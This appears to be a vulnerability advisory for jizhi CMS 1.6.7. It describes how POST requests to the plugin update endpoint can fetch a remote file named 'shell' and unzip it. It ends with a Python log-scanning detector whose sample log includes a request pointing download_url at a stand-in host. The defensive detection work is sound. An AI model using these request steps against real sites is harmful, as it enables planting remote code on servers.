vendor: jizhi CMS
by: iej1ctk1g
CVSS: 7.5 HIGH
Arbitrary File Download
CWE: 434
Product Name: jizhi CMS
Affected Version From: 1.6.7
Affected Version To: 1.6.7
Patch Exists: YES
Related CWE: N/A
CPE: a:jizhicms:jizhi_cms
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Mac OS
2020
jizhi CMS 1.6.7 – Arbitrary File Download
jizhi CMS 1.6.7 is vulnerable to an arbitrary file download vulnerability. An attacker can send a specially crafted HTTP request to the vulnerable server to download arbitrary files from the server. The vulnerability is exploited by sending a POST request to the /admin.php/Plugins/update.html endpoint with the action parameter set to start-download and the filepath parameter set to shell; the download_url parameter is set to the URL of the malicious file to be downloaded. An attacker can also send a POST request to the same endpoint with the action parameter set to file-upzip and the filepath parameter set to shell to unzip the malicious file.
Mitigation:
The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of jizhi CMS.
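Detection logic for the requests described above, added here as an example and not taken from the original advisory or from the jizhi CMS project: it scans request logs for POSTs to /admin.php/Plugins/update.html that use the start-download and file-upzip actions, and marks an unzip that follows a fetch of the same filepath from the same source. The JSON-lines log schema (ts, src, method, path, body), the function names and the sample records are assumptions constructed for illustration.

```python
import json
from urllib.parse import parse_qs, unquote, urlsplit

ENDPOINT = "/admin.php/plugins/update.html"   # path from the advisory, lower-cased
ACTIONS = {"start-download", "file-upzip"}    # action values from the advisory

# Constructed sample records; the JSON field names are an assumed log schema.
SAMPLE_LOG = """\
{"ts":"2020-01-01T10:00:00Z","src":"198.51.100.7","method":"POST","path":"/admin.php/Plugins/update.html","body":"action=start-download&filepath=shell&download_url=http%3A%2F%2Ffiles.example.net%2Fa.zip"}
{"ts":"2020-01-01T10:00:05Z","src":"198.51.100.7","method":"POST","path":"/admin.php/Plugins/update.html","body":"action=file-upzip&filepath=shell"}
{"ts":"2020-01-01T10:01:00Z","src":"203.0.113.9","method":"GET","path":"/admin.php/Plugins/update.html","body":""}
{"ts":"2020-01-01T10:02:00Z","src":"203.0.113.9","method":"POST","path":"/admin.php/Plugins/update.html?x=1","body":"action=check-version"}
not-json garbage line
"""

def first(form, key):
    """Return the first value of a form field, or '' if absent."""
    return form.get(key, [""])[0]

def find_plugin_update_abuse(log_text):
    """Flag POSTs to the plugin update endpoint that use the advisory's actions."""
    findings, fetched = [], set()   # fetched: (src, filepath) seen in start-download
    for line in log_text.splitlines():
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue                # skip malformed lines instead of aborting the scan
        if not isinstance(rec, dict):
            continue
        # Drop any query string, decode %-escapes and ignore case before comparing.
        path = unquote(urlsplit(rec.get("path", "")).path).lower()
        if rec.get("method", "").upper() != "POST" or path != ENDPOINT:
            continue
        form = parse_qs(rec.get("body", ""), keep_blank_values=True)
        action, target = first(form, "action"), first(form, "filepath")
        if action not in ACTIONS:
            continue
        key = (rec.get("src"), target)
        if action == "start-download":
            fetched.add(key)
        findings.append({
            "ts": rec.get("ts"), "src": rec.get("src"), "action": action,
            "filepath": target,
            "remote_host": urlsplit(first(form, "download_url")).hostname,
            # True when this unzip follows a fetch of the same filepath by one source
            "chained": action == "file-upzip" and key in fetched,
        })
    return findings
```

Matches are candidates for review rather than confirmed compromise; `remote_host` and `chained` are the fields to triage first.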